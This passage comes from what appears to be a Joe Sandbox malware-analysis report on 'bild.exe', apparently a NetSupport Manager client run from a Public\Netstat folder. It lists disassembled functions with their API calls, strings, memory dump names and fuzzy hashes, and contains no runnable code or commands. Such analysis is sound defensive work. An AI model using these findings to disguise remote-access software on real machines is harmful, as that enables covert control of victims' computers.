                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throwstd::exception::exception
                                                                                          • String ID: VolumeControl exception : %hs
                                                                                          • API String ID: 3728558374-910296547
                                                                                          • Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                          • Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
                                                                                          • Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                          • Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1
                                                                                          APIs
                                                                                            • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                            • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                          • _memmove.LIBCMT ref: 11147211
                                                                                          Strings
                                                                                          • Failed to get callstack, xrefs: 111471BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentFileModuleNameProcess_memmove
                                                                                          • String ID: Failed to get callstack
                                                                                          • API String ID: 4135527288-766476014
                                                                                          • Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                          • Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
                                                                                          • Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                          • Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 1106309F
                                                                                            • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                            • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                          • _swscanf.LIBCMT ref: 11063104
                                                                                          Strings
                                                                                          • %d %d %d %d %d %d %d %d %d, xrefs: 110630FE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _memset$_malloc_swscanf
                                                                                          • String ID: %d %d %d %d %d %d %d %d %d
                                                                                          • API String ID: 226140750-2123045714
                                                                                          • Opcode ID: 5de41e09c8b144a63b13678be45da27601cef65f4b7b935b85075449f985e797
                                                                                          • Instruction ID: 298e6396b29eeabd8d352511c8cf028c9fd899b3f0ddf6bd5fc34ff26e9d1feb
                                                                                          • Opcode Fuzzy Hash: 5de41e09c8b144a63b13678be45da27601cef65f4b7b935b85075449f985e797
                                                                                          • Instruction Fuzzy Hash: 89117F76500205ABD721CA55CCC0EEB77FCEF89758B004919F64A8B540E671F958C7A1
                                                                                          APIs
                                                                                          • wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                          • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                          • API String ID: 175691280-2052047905
                                                                                          • Opcode ID: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                          • Instruction ID: 95fe0cd820de1796fd70713afb7a02e85a0165c228f84a05359d3cb2f5b90ec5
                                                                                          • Opcode Fuzzy Hash: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                          • Instruction Fuzzy Hash: 4FF0A47AA0025CBBCB00DEA5DD40BEEFBBD9B45248F044199E608A7140DE706A45C7A5
                                                                                          APIs
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread__wcstoi64
                                                                                          • String ID: *TapiFixPeriod$Bridge
                                                                                          • API String ID: 1152747075-2058455932
                                                                                          • Opcode ID: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                          • Instruction ID: bf80e38bc05b38b2fab7e3f27e0d367de778c9bee9065702c43ca09430eaf323
                                                                                          • Opcode Fuzzy Hash: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                          • Instruction Fuzzy Hash: 60F0E57074532D7EFB11DAD6CC45F79B6989300B08FA0003DF528551C8E6B1B9008766
                                                                                          APIs
                                                                                          • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                          • m_hWnd, xrefs: 11001096
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                          • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                          • API String ID: 2046328329-2830328467
                                                                                          • Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                          • Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
                                                                                          • Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                          • Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1
                                                                                          APIs
                                                                                          • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                          • m_hWnd, xrefs: 11001056
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                          • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                          • API String ID: 819365019-2830328467
                                                                                          • Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                          • Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
                                                                                          • Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                          • Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0
                                                                                          APIs
                                                                                          • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                          • m_hWnd, xrefs: 110010E6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                          • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                          • API String ID: 906220102-2830328467
                                                                                          • Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                          • Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
                                                                                          • Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                          • Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0
                                                                                          APIs
                                                                                          • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                          • m_hWnd, xrefs: 11001126
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                          • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                          • API String ID: 1604732272-2830328467
                                                                                          • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                          • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                          • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                          • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
                                                                                          APIs
                                                                                          • KillTimer.USER32(?,?), ref: 1100102B
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                          • m_hWnd, xrefs: 11001016
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                          • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                          • API String ID: 2229609774-2830328467
                                                                                          • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                          • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                          • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                          • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _strncpy
                                                                                          • String ID: 1000,50$1000,50
                                                                                          • API String ID: 2961919466-2776873633
                                                                                          • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                          • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                          • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
